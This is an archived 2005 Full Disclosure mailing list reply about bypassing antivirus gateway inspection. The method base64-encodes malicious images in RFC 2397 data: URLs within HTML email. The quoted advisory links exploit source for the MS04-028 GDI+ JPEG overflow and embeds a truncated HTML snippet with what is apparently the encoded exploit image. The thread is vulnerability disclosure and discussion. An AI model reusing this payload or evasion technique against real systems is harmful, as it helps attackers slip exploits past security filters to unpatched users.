Full Disclosure mailing list archives
Re: Multi-vendor AV gateway image inspection bypass vulnerability
From: Steven Rakick <stevenrakick () yahoo com>
Date: Wed, 12 Jan 2005 12:37:42 -0800 (PST)
This would mean that if an image exploiting the recently announced Microsoft LoadImage API overflow were imbedded into HTML email there would be zero defense from the network layer as it would be completely invisible. Why am I not seeing more about this in the press? It seems pretty threatening to me...
On Tue, 11 Jan 2005 14:58:43 -0500, Darren Bounds <lists () intrusense com> wrote:Hello Danny, This vulnerability is only applicable to the HTTPdata while intransit. Once received by the client the imagewill be rendered andsubsequently detected if local AV software. At the present time, I'm not aware of any AV, IDSor IPS vendor thatwill detect malicious images imbedded in HTML inthis manner.Thank you, Darren Bounds Intrusense, LLC. -- Intrusense - Securing Business As Usual On Jan 11, 2005, at 2:14 PM, Danny wrote:On Mon, 10 Jan 2005 14:08:11 -0500, DarrenBounds<dbounds () intrusense com> wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multi-vendor AV gateway image inspection bypassvulnerabilityJanuary 10, 2005 A vulnerability has been discovered whichallows a remote attacker tobypass anti-virus (as well other security technologies such asIDS and IPS) inspectionof HTTP image content. By leveraging techniques described in RFC 2397for base64 encodingimage content within the URL scheme. A remote attack may encode amalicious image withinthe body of an HTML formatted document to circumvent contentinspection.For example:
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
The source code at the URL above will bydefault create a JPEG imagethat will attempt (and fail without tweaking) to exploit the MicrosoftMS04-028 GDI+vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophosand McAfee), however,when the same image is base64 encoded using the technique describedin RFC 2397(documented below), inspection is not performed and is delivered rendered bythe client.While Microsoft Internet Explorer does notsupport the RFC 2397 URLscheme; Firefox, Safari, Mozilla and Opera do and will render the dataand thus successfullyexecute the payload if the necessary OS and/or application patches have not beenapplied.## BEGIN HTML ## <html> <body> <img
src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw /
X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
B
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv
/b
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
Iy MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/ xAAfAAABBQEBAQEBAQAAAAAAAAAA AQIDBAUGBwgJCgv/
xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2
Rl
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc
bH
=== message truncated ===
__________________________________
Do you Yahoo!?
Yahoo! Mail - now with 250MB free storage. Learn more.
http://info.mail.yahoo.com/mail_250
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 10)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability - KMail Noam Rathaus (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Danny (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 11)
- <Possible follow-ups>
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Nils Ketelsen (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)